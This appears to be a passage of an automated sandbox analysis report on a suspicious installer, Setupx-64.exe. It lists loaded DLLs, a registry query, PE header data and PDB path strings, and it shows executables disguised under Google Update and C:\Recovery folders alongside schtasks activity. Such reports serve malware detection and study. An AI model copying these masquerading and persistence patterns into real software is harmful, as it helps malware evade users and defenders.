            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: winmmbase.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: mmdevapi.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: ksuser.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: avrt.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: audioses.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: midimap.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Recovery\fontdrvhost.exeSection loaded: mscoree.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: apphelp.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: kernel.appcore.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: version.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: uxtheme.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: windows.storage.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: wldp.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: profapi.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: cryptsp.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: rsaenh.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: cryptbase.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: sspicli.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: mscoree.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: kernel.appcore.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: version.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: uxtheme.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: windows.storage.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: wldp.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: profapi.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: cryptsp.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: rsaenh.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: cryptbase.dll
            Source: C:\Recovery\fontdrvhost.exeSection loaded: sspicli.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: mscoree.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: apphelp.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: kernel.appcore.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: version.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: uxtheme.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: windows.storage.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: wldp.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: profapi.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: cryptsp.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: rsaenh.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: cryptbase.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: sspicli.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: mscoree.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: kernel.appcore.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: version.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: uxtheme.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: windows.storage.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: wldp.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: profapi.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: cryptsp.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: rsaenh.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: cryptbase.dll
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Setupx-64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Setupx-64.exeStatic file information: File size 2710754 > 1048576
            Source: Setupx-64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Setupx-64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Setupx-64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Setupx-64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Setupx-64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Setupx-64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Setupx-64.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Setupx-64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: nC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: }C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: fC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.000000000618A000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: yC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: wC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Setupx-64.exe
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: zC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: hC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: xC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: oC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.000000000618A000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: ~C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: lC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
